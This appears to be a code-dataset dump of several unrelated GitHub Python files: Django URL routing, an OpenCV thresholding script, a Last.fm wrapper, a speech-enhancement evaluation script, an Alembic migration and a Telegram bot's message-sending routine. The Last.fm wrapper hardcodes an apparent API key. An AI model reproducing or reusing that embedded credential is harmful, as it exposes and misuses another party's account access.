https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path,include\nfrom catalog import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n # path('',views.index,name='index')\n \n]\n\nurlpatterns += [\n path('catalog/', include('catalog.urls')), #This is because the url is associated to the particular application \n]\n\n#Add Django site authentication urls (for login, logout, password management)\n\nurlpatterns += [\n path(\"accounts/\", include('django.contrib.auth.urls')),\n path(\"accounts/login/\", include('django.contrib.auth.urls'),name='login'),\n # path(\"accounts/logout/\", include('django.contrib.auth.urls'),name=\"'logout'\"),\n # path(\"accounts/password_change/\", include('django.contrib.auth.urls'),name='password_change'),\n # path(\"accounts/password_change/done/\", include('django.contrib.auth.urls'),name='password_change_done'),\n # path(\"accounts/password_reset/\", include('django.contrib.auth.urls'),name='password_reset'),\n # path(\"accounts/password_reset/done/\", include('django.contrib.auth.urls'),name='password_reset_done'),\n # path(\"accounts/reset///\", include('django.contrib.auth.urls'),name='password_reset_confirm'),\n # path(\"accounts/reset/done/\", include('django.contrib.auth.urls'),name='password_reset_complete'),\n]\n", "repo_name": "cpmakwana28/django_library", "sub_path": "locallibrary/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1932, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "30831748691", "text": "import cv2\n\nimg = cv2.imread('data/pages/test_shadow.png', cv2.IMREAD_GRAYSCALE)\n\nval = 100\n\nimg[img > val] = img[img > val] - val\n\n\nret2,th2 = cv2.threshold(img,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\ncv2.imshow('thresh otsu', th2)\ncv2.waitKey()\n\ncv2.imwrite('doc-images/tresh_shadow.png', th2)\n", "repo_name": "DanielAvram1/handwriting-recognition", "sub_path": "thresholding.py", "file_name": "thresholding.py", "file_ext": "py", "file_size_in_byte": 302, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.imread", "line_number": 3, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 3, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY_INV", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_OTSU", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "22705476461", "text": "import logging\nfrom typing import Callable, Tuple\n\nimport pylast\n\nimport util\nfrom wrappers import track_info\n\nlogger = logging.getLogger(\"discord_fm\").getChild(__name__)\n\n\nclass LastFMUser:\n _last_request: Tuple[pylast.Track, track_info.TrackInfo] = (None, None)\n\n def __init__(self, manager, inactive_func: Callable = None):\n self.m = manager\n username = self.m.settings.get(\"username\")\n logger.debug(f'Reloading LastFMUser with username \"{username}\"')\n\n if username == \"\":\n raise ValueError(\"Username is empty\")\n\n network = pylast.LastFMNetwork(api_key=\"2cd4164de6a19995e9ff4b59bd17fc20\")\n\n self.username = username\n self.inactive_func = inactive_func\n self.user = network.get_user(username)\n\n def now_playing(self):\n handler = util.request_handler.RequestHandler(\n self.m, \"user's Now Playing\", self.inactive_func\n )\n request = handler.attempt_request(self.user.get_now_playing)\n\n if request == self._last_request[0]:\n return self._last_request[1]\n elif request is not None:\n info = track_info.TrackInfo(self.m, request)\n self._last_request = (request, info)\n return info\n else:\n return None\n\n def check_username(self):\n try:\n handler = util.request_handler.RequestHandler(self.m, \"username validity\")\n handler.attempt_request(self.user.get_now_playing)\n return True\n except pylast.WSError as e:\n if e.details == \"User not found\":\n return False\n", "repo_name": "androidWG/Discord.fm", "sub_path": "src/wrappers/last_fm_user.py", "file_name": "last_fm_user.py", "file_ext": "py", "file_size_in_byte": 1609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 13, "usage_type": "name"}, {"api_name": "pylast.Track", "line_number": 13, "usage_type": "attribute"}, {"api_name": "wrappers.track_info.TrackInfo", "line_number": 13, "usage_type": "attribute"}, {"api_name": "wrappers.track_info", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 15, "usage_type": "name"}, {"api_name": "pylast.LastFMNetwork", "line_number": 23, "usage_type": "call"}, {"api_name": "util.request_handler.RequestHandler", "line_number": 30, "usage_type": "call"}, {"api_name": "util.request_handler", "line_number": 30, "usage_type": "attribute"}, {"api_name": "wrappers.track_info.TrackInfo", "line_number": 38, "usage_type": "call"}, {"api_name": "wrappers.track_info", "line_number": 38, "usage_type": "name"}, {"api_name": "util.request_handler.RequestHandler", "line_number": 46, "usage_type": "call"}, {"api_name": "util.request_handler", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pylast.WSError", "line_number": 49, "usage_type": "attribute"}]} +{"seq_id": "42588237606", "text": "import os\nimport random\nimport soundfile as sf\nimport torch\nimport yaml\nimport json\nimport argparse\nimport pandas as pd\nfrom tqdm import tqdm\nfrom pprint import pprint\nfrom pathlib import Path\nimport torch\ntorch.backends.cudnn.enabled=False\nfrom asteroid.metrics import get_metrics\nfrom asteroid.data.librimix_dataset import LibriMix\nfrom asteroid.losses import PITLossWrapper, pairwise_neg_sisdr\nfrom asteroid.models import DCCRNet_mini\nfrom asteroid.models import save_publishable\nfrom asteroid.utils import tensors_to_device\nfrom asteroid.dsp.normalization import normalize_estimates\nfrom asteroid.metrics import WERTracker, MockWERTracker\n\n\n\nCOMPUTE_METRICS = [\"si_sdr\", \"sdr\", \"sir\", \"sar\", \"stoi\",'pesq']\nSAMPLE_RATE = 16000\nn_save_ex = 5\n\n## CLSKD model eval\nmodel_path = '/root/NTH_student/Speech_Enhancement_new/knowledge_distillation_CLSKD/checkpoint/the_best_model.pth'\nex_save_dir = '/root/NTH_student/Speech_Enhancement_new/knowledge_distillation_CLSKD/example_CLSKD'\nresule_dir = '/root/NTH_student/Speech_Enhancement_new/knowledge_distillation_CLSKD/results/All_metric.json'\n\n## SPKD model eval\n#model_path = '/root/NTH_student/Speech_Enhancement_new/knowledge_distillation_CLSKD/checkpoint_SPKD/SPKD_best_model.pth'\n\ndef main():\n wer_tracker = (MockWERTracker())\n model = DCCRNet_mini.from_pretrained(model_path)\n # Handle device placement\n model_device = next(model.parameters()).device\n test_set = LibriMix(\n csv_dir='/root/NTH_student/Speech_Enhancement_new/asteroid/egs/librimix/DCCRNet/data/wav16k/max/test',\n task='enh_single',\n sample_rate=SAMPLE_RATE,\n n_src=1,\n segment=None,\n return_id=True,\n ) # Uses all segment length\n # Used to reorder sources only\n loss_func = PITLossWrapper(pairwise_neg_sisdr, pit_from=\"pw_mtx\")\n save_idx = random.sample(range(len(test_set)), n_save_ex)\n\n series_list = []\n torch.no_grad().__enter__()\n for idx in tqdm(range(len(test_set))):\n # Forward the network on the mixture.\n mix, sources, ids = test_set[idx]\n mix, sources = tensors_to_device([mix, sources], device=model_device)\n est_sources = model(mix.unsqueeze(0))\n loss, reordered_sources = loss_func(est_sources, sources[None], return_est=True)\n mix_np = mix.data.numpy()\n sources_np = sources.data.numpy()\n est_sources_np = reordered_sources.squeeze(0).cpu().data.numpy()\n # For each utterance, we get a dictionary with the mixture path,\n # the input and output metrics\n utt_metrics = get_metrics(\n mix_np,\n sources_np,\n est_sources_np,\n sample_rate=SAMPLE_RATE,\n # metrics_list=COMPUTE_METRICS,\n )\n utt_metrics[\"mix_path\"] = test_set.mixture_path\n est_sources_np_normalized = normalize_estimates(est_sources_np, mix_np)\n utt_metrics.update(\n **wer_tracker(\n mix=mix_np,\n clean=sources_np,\n estimate=est_sources_np_normalized,\n wav_id=ids,\n sample_rate=SAMPLE_RATE,\n )\n )\n series_list.append(pd.Series(utt_metrics))\n\n #save some examples\n # Save some examples in a folder. Wav files and metrics as text.\n if idx in save_idx:\n local_save_dir = os.path.join(ex_save_dir, \"ex_{}/\".format(idx))\n os.makedirs(local_save_dir, exist_ok=True)\n sf.write(local_save_dir + \"mixture.wav\", mix_np, SAMPLE_RATE)\n # Loop over the sources and estimates\n for src_idx, src in enumerate(sources_np):\n sf.write(local_save_dir + \"s{}.wav\".format(src_idx), src, SAMPLE_RATE)\n for src_idx, est_src in enumerate(est_sources_np_normalized):\n sf.write(\n local_save_dir + \"s{}_estimate.wav\".format(src_idx),\n est_src,\n SAMPLE_RATE,\n )\n\n # Save all metrics to the experiment folder.\n all_metrics_df = pd.DataFrame(series_list)\n #all_metrics_df.to_csv(os.path.join(eval_save_dir, \"all_metrics.csv\"))\n\n # Print and save summary metrics\n final_results = {}\n for metric_name in COMPUTE_METRICS:\n input_metric_name = \"input_\" + metric_name\n ldf = all_metrics_df[metric_name] - all_metrics_df[input_metric_name]\n final_results[metric_name] = all_metrics_df[metric_name].mean()\n final_results[metric_name + \"_imp\"] = ldf.mean()\n\n print(\"Overall metrics :\")\n pprint(final_results)\n\n with open(resule_dir,'w') as fp:\n json.dump(final_results,fp) \n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "KhanhNguyen4999/Speech-Enhancement-CLSKD", "sub_path": "eval.py", "file_name": "eval.py", "file_ext": "py", "file_size_in_byte": 4666, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.backends", "line_number": 13, "usage_type": "attribute"}, {"api_name": "asteroid.metrics.MockWERTracker", "line_number": 38, "usage_type": "call"}, {"api_name": "asteroid.models.DCCRNet_mini.from_pretrained", "line_number": 39, "usage_type": "call"}, {"api_name": "asteroid.models.DCCRNet_mini", "line_number": 39, "usage_type": "name"}, {"api_name": "asteroid.data.librimix_dataset.LibriMix", "line_number": 42, "usage_type": "call"}, {"api_name": "asteroid.losses.PITLossWrapper", "line_number": 51, "usage_type": "call"}, {"api_name": "asteroid.losses.pairwise_neg_sisdr", "line_number": 51, "usage_type": "argument"}, {"api_name": "random.sample", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 55, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 56, "usage_type": "call"}, {"api_name": "asteroid.utils.tensors_to_device", "line_number": 59, "usage_type": "call"}, {"api_name": "asteroid.metrics.get_metrics", "line_number": 67, "usage_type": "call"}, {"api_name": "asteroid.dsp.normalization.normalize_estimates", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 91, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 92, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 95, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 116, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "73917588353", "text": "\"\"\"update predicates limit\n\nRevision ID: aa709a1d876a\nRevises: 5068aee30aed\nCreate Date: 2021-10-25 15:38:58.526535\n\n\"\"\"\nimport sqlalchemy as sa\n\nfrom alembic import context, op\n\n# revision identifiers, used by Alembic.\nrevision = \"aa709a1d876a\"\ndown_revision = \"5068aee30aed\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n if context.get_x_argument(as_dictionary=True).get(\"sqlite\", None):\n with op.batch_alter_table(\"dataset\") as batch_op:\n batch_op.drop_column(\"predicates\")\n batch_op.add_column(sa.Column(\"predicates\", sa.Text(20000), nullable=True))\n else:\n op.alter_column(\n \"dataset\",\n \"predicates\",\n existing_type=sa.String(length=500),\n type_=sa.Text(20000),\n existing_nullable=True,\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n if context.get_x_argument(as_dictionary=True).get(\"sqlite\", None):\n with op.batch_alter_table(\"dataset\") as batch_op:\n batch_op.drop_column(\"predicates\")\n batch_op.add_column(\n sa.Column(\"predicates\", sa.String(length=500), nullable=True)\n )\n else:\n op.alter_column(\n \"dataset\",\n \"predicates\",\n existing_type=sa.Text(20000),\n type_=sa.String(length=500),\n existing_nullable=True,\n )\n # ### end Alembic commands ###", "repo_name": "IJtLJZ8Rm4Yr/ymir-backend", "sub_path": "src/pymir-app/alembic/versions/aa709a1d876a_update_predicates_limit.py", "file_name": "aa709a1d876a_update_predicates_limit.py", "file_ext": "py", "file_size_in_byte": 1560, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "alembic.context.get_x_argument", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.context", "line_number": 21, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 24, "usage_type": "call"}, {"api_name": "alembic.op.alter_column", "line_number": 26, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 26, "usage_type": "name"}, {"api_name": "sqlalchemy.String", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.context.get_x_argument", "line_number": 38, "usage_type": "call"}, {"api_name": "alembic.context", "line_number": 38, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 39, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 39, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 42, "usage_type": "call"}, {"api_name": "alembic.op.alter_column", "line_number": 45, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 45, "usage_type": "name"}, {"api_name": "sqlalchemy.Text", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "27688653098", "text": "from django.urls import path, include\nfrom .views import BillAPI, ComplaintAPI, ResidentAPI, NoticeAPI\n\n\nurlpatterns = [\n path('residentapi//', ResidentAPI.as_view(), name='residentapipk'),\n path('residentapi/', ResidentAPI.as_view(), name='residentapi'),\n path('billapi//', BillAPI.as_view(), name='billapipk'),\n path('billapi/', BillAPI.as_view(), name='billapi'),\n path('noticeapi/', NoticeAPI.as_view(), name='noticeapi'),\n path('complaintapi/', ComplaintAPI.as_view(), name='complaintapi'),\n]", "repo_name": "Keshav-Agarwal/HousingSociety", "sub_path": "backend/housingsocietyapi/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "views.ResidentAPI.as_view", "line_number": 6, "usage_type": "call"}, {"api_name": "views.ResidentAPI", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.ResidentAPI.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "views.ResidentAPI", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.BillAPI.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "views.BillAPI", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.BillAPI.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "views.BillAPI", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "views.NoticeAPI.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "views.NoticeAPI", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.ComplaintAPI.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.ComplaintAPI", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "9181057671", "text": "import json\nimport time\nimport sys\nimport re\n\nfrom Foos import Actions, Dialogs, BotsFoos\nfrom Core import HTTPLL, Unreloaded, Error, Manager\nfrom LowLevel import DBs\nfrom Utils import Logger as Log, Utils\n\n\nrecursivity = {}\n\n\n# ToDo: Split this function in more methods\ndef send(infos, sezione,\n antispam=True,\n to_id=None,\n special_name=None,\n special_group_name=None,\n special_user_name=None,\n no_log=False,\n special_token=None,\n special_bid=None,\n special_text=None,\n ignore_specials=False,\n recorsivity=None,\n add=None,\n parse=\"markdown\"):\n text = \"\"\n try:\n quote = False\n inter_bot_id = None\n sezione_inter = None\n quitta = False\n no_prew = False\n\n if sezione:\n infos.trigger = sezione\n else:\n infos.trigger = \"\"\n\n if recorsivity:\n if recorsivity > 3:\n return\n else:\n recorsivity += 1\n else:\n recorsivity = 1\n\n if not to_id:\n to_id = infos.cid\n\n if special_group_name:\n infos.name = special_group_name\n if special_user_name:\n infos.user.name = special_user_name\n\n if special_token:\n infos.token = special_token\n\n if special_bid:\n infos.bid = special_bid\n\n if not special_text:\n\n text = Dialogs.get_text(infos, sezione)\n if add:\n try:\n text += add\n except Exception:\n pass\n if not text:\n return False\n\n if text.lower() == \"skip\" or text.lower() == \"+skip+\":\n return True\n\n if antispam:\n if Unreloaded.antispam(infos):\n return True\n\n else:\n text = special_text\n\n text = Dialogs.section_replacer(infos, text)\n\n if infos.api:\n return text\n\n if \"[warn]\" in text:\n return BotsFoos.warn(infos)\n\n if \"[unwarn]\" in text:\n return BotsFoos.unwarn(infos)\n\n if \"+exe+\" in text:\n infos.master_message(\"Master, +exe+ is deprecated:\\n`\" + text + \"`\\nIn `\" + sezione + \"`\",\n parse_mode=\"markdown\")\n Log.a(\"[%s] U: %s %s\" % (infos.bot_name, infos.user.username, sezione))\n return\n\n if not ignore_specials:\n text = Utils.replacer(infos, text)\n text = Actions.action(infos, text, sezione)\n if not text:\n return\n\n if type(text) is bool:\n return\n\n if \"[noprew]\" in text:\n text = text.replace(\"[noprew]\", \"\")\n no_prew = True\n\n if \"[quote]\" in text:\n text = text.replace(\"[quote]\", \"\")\n quote = infos.user.message.id\n\n if \"[quote2]\" in text:\n text = text.replace(\"[quote2]\", \"\")\n if infos.to_user:\n quote = infos.to_user.message.id\n\n if \"[quit]\" in text:\n text = text.replace(\"[quit]\", \"\")\n quitta = True\n\n match = re.search(\"\\[(\\d+)\\]\", text)\n if match:\n if int(match.group(1)) not in Manager.get_bots_id():\n return HTTPLL.sendMessage(infos.token, Manager.get_prop_id(infos.token),\n \"%s non è un ID valido.\" % match.group(1))\n\n result = text.split(\"[\" + match.group(1) + \"]\")\n\n trigs = json.loads(open(\"Files/bot_files/%s/%s\" % (match.group(1), \"triggers.json\")).read())\n\n if \"autorizzati\" not in trigs:\n HTTPLL.sendMessage(infos.token, infos.prop_id, \"%s non ti ha autorizzato.\" % match.group(1))\n\n elif infos.bid not in trigs[\"autorizzati\"]:\n HTTPLL.sendMessage(infos.token, infos.prop_id, \"%s non ti ha autorizzato.\" % match.group(1))\n # infos.reply(\"Autorizzati: %s\" % )\n else:\n inter_bot_id = int(match.group(1))\n sezione_inter = result[1]\n\n text = result[0]\n\n if special_name:\n text = text.replace(\"+newuser+\", special_name)\n\n if not text:\n return\n\n text, kb = Utils.get_keyboard(text)\n if text == \"\":\n return\n\n try:\n caption = None\n if \"+stk+\" in text:\n stk = text.split(\"()\")[1]\n HTTPLL.sendSticker(infos.token, chat_id=to_id, sticker=stk)\n return True\n\n if \"+pht+\" in text:\n elems = text.split(\"()\")\n pht = elems[1]\n if len(elems) == 3:\n caption = elems[2]\n HTTPLL.sendChatAction(infos.token, to_id, 'upload_photo')\n time.sleep(0.3)\n HTTPLL.sendPhoto(infos.token, chat_id=to_id, photo=pht, caption=caption, reply_to_message_id=quote)\n return True\n\n if \"+doc+\" in text:\n elems = text.split(\"()\")\n doc = elems[1]\n if len(elems) == 3:\n caption = elems[2]\n HTTPLL.sendDocument(infos.token, to_id, doc, caption=caption, reply_to_message_id=quote)\n return True\n\n if \"+aud+\" in text or \"+voi+\" in text:\n aud = text.split(\"()\")[1]\n HTTPLL.sendVoice(infos.token, to_id, aud, reply_to_message_id=quote)\n return True\n\n if \"+vid+\" in text:\n elems = text.split(\"()\")\n vid = elems[1]\n if len(elems) == 3:\n caption = elems[2]\n HTTPLL.sendVideo(infos.token, to_id, vid, caption=caption, reply_to_message_id=quote)\n return True\n except Exception as err:\n Log.w(\"Errore nell'invio del media: %s\" % err)\n return False\n\n text = Utils.escape_markdown(text)\n\n text = text.replace(\"\", \"*\").replace(\"\", \"*\")\n text = text.replace(\"\", \"`\").replace(\"\", \"`\")\n text = text.replace(\"\", \"_\").replace(\"\", \"_\")\n\n text = Utils.link_elab(text, infos)\n\n text = re.sub(\"\\/\\w+\\\\_\\w+\", \"$&\", text).replace(\"\\\\\\\\_\", \"\\\\_\")\n\n match = re.search(\"\\B.+\\B\", text)\n if match:\n iquote = \"[%s](tg://user?id=%s)\" % (str(match.group(0))\n .replace(\"\", \"\").replace(\"\", \"\"), infos.user.uid)\n text = re.sub(\"\\B.+\\B\", iquote, text)\n\n result = re.finditer(re.compile(r\"\\*.+?\\*\"), text)\n if result:\n for res in result:\n text = text.replace(res.group(), res.group(0).replace(\"\\_\", \"_\"))\n\n HTTPLL.sendChatAction(infos.token, to_id, 'typing')\n HTTPLL.sendMessage(infos.token, chat_id=to_id, text=text, parse_mode=parse,\n disable_web_page_preview=no_prew, reply_to_message_id=quote, reply_markup=kb)\n\n if not no_log:\n Log.a(\"%s <- %s -> [%s]\" % (infos.bid, infos.user.uid, sezione))\n\n if infos.chat_private:\n return\n if quitta:\n HTTPLL.leaveChat(infos.token, infos.cid)\n if inter_bot_id and sezione_inter:\n try:\n send(infos, sezione_inter, special_token=Manager.get_token_from_bot_id(inter_bot_id),\n antispam=False,\n special_bid=inter_bot_id,\n recorsivity=recorsivity)\n except Exception:\n pass\n return True\n\n except Error.Unauthorized:\n if not to_id:\n Log.e(\"Qualcosa non va, l'ID era None...\")\n return \"ERR\"\n DBs.remove_id(infos.entity, to_id)\n return \"ERR\"\n\n except Error.BadRequest as err:\n if \"chat not found\" in str(err):\n return\n\n if \"group chat was migrated\" in str(err):\n DBs.remove_id(infos.entity, to_id)\n return \"ERR\"\n\n Log.e(\"Bot %s -> BadRequest (%s)\" % (infos.bot_name, err))\n\n if infos.user.is_owner:\n infos.reply(\"Master non sono riuscita ad inviare questo messaggio:\\n\"\n \"`%s`\\nSegnalalo a @Kaikyu o controlla la formattazione.\" % text, markdown=True)\n return \"ERR\"\n\n except Error.NotEnoughtRights:\n DBs.remove_id(infos.entity, to_id)\n return \"ERR\"\n\n except Exception as err:\n msg = \"Ho trovato un errore: riga {} {} {}\".format(sys.exc_info()[-1].tb_lineno, type(err).__name__, err)\n HTTPLL.sendMessage(infos.token, infos.prop_id, msg)\n Log.e(msg)\n if \"can't parse\" in str(err).lower():\n # noinspection PyTypeChecker\n send(infos, \"\",\n to_id=Manager.get_prop_id(infos.token),\n special_text=\"C'è un problema con la formattazione del messaggio:\\n\\n%s\" % text,\n parse=None,\n antispam=False)\n return \"ERR\"\n", "repo_name": "KaikyuLotus/kitsu-maker-bot", "sub_path": "Core/Dialoger.py", "file_name": "Dialoger.py", "file_ext": "py", "file_size_in_byte": 9061, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Foos.Dialogs.get_text", "line_number": 67, "usage_type": "call"}, {"api_name": "Foos.Dialogs", "line_number": 67, "usage_type": "name"}, {"api_name": "Core.Unreloaded.antispam", "line_number": 80, "usage_type": "call"}, {"api_name": "Core.Unreloaded", "line_number": 80, "usage_type": "name"}, {"api_name": "Foos.Dialogs.section_replacer", "line_number": 86, "usage_type": "call"}, {"api_name": "Foos.Dialogs", "line_number": 86, "usage_type": "name"}, {"api_name": "Foos.BotsFoos.warn", "line_number": 92, "usage_type": "call"}, {"api_name": "Foos.BotsFoos", "line_number": 92, "usage_type": "name"}, {"api_name": "Foos.BotsFoos.unwarn", "line_number": 95, "usage_type": "call"}, {"api_name": "Foos.BotsFoos", "line_number": 95, "usage_type": "name"}, {"api_name": "Utils.Logger.a", "line_number": 100, "usage_type": "call"}, {"api_name": "Utils.Logger", "line_number": 100, "usage_type": "name"}, {"api_name": "Utils.Utils.replacer", "line_number": 104, "usage_type": "call"}, {"api_name": "Utils.Utils", "line_number": 104, "usage_type": "name"}, {"api_name": "Foos.Actions.action", "line_number": 105, "usage_type": "call"}, {"api_name": "Foos.Actions", "line_number": 105, "usage_type": "name"}, {"api_name": "re.search", "line_number": 129, "usage_type": "call"}, {"api_name": "Core.Manager.get_bots_id", "line_number": 131, "usage_type": "call"}, {"api_name": "Core.Manager", "line_number": 131, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendMessage", "line_number": 132, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 132, "usage_type": "name"}, {"api_name": "Core.Manager.get_prop_id", "line_number": 132, "usage_type": "call"}, {"api_name": "Core.Manager", "line_number": 132, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 137, "usage_type": "call"}, {"api_name": "Core.HTTPLL.sendMessage", "line_number": 140, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 140, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendMessage", "line_number": 143, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 143, "usage_type": "name"}, {"api_name": "Utils.Utils.get_keyboard", "line_number": 157, "usage_type": "call"}, {"api_name": "Utils.Utils", "line_number": 157, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendSticker", "line_number": 165, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 165, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendChatAction", "line_number": 173, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 173, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 174, "usage_type": "call"}, {"api_name": "Core.HTTPLL.sendPhoto", "line_number": 175, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 175, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendDocument", "line_number": 183, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 183, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendVoice", "line_number": 188, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 188, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendVideo", "line_number": 196, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 196, "usage_type": "name"}, {"api_name": "Utils.Logger.w", "line_number": 199, "usage_type": "call"}, {"api_name": "Utils.Logger", "line_number": 199, "usage_type": "name"}, {"api_name": "Utils.Utils.escape_markdown", "line_number": 202, "usage_type": "call"}, {"api_name": "Utils.Utils", "line_number": 202, "usage_type": "name"}, {"api_name": "Utils.Utils.link_elab", "line_number": 208, "usage_type": "call"}, {"api_name": "Utils.Utils", "line_number": 208, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 210, "usage_type": "call"}, {"api_name": "re.search", "line_number": 212, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 216, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 218, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 218, "usage_type": "call"}, {"api_name": "Core.HTTPLL.sendChatAction", "line_number": 223, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 223, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendMessage", "line_number": 224, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 224, "usage_type": "name"}, {"api_name": "Utils.Logger.a", "line_number": 228, "usage_type": "call"}, {"api_name": "Utils.Logger", "line_number": 228, "usage_type": "name"}, {"api_name": "Core.HTTPLL.leaveChat", "line_number": 233, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 233, "usage_type": "name"}, {"api_name": "Core.Manager.get_token_from_bot_id", "line_number": 236, "usage_type": "call"}, {"api_name": "Core.Manager", "line_number": 236, 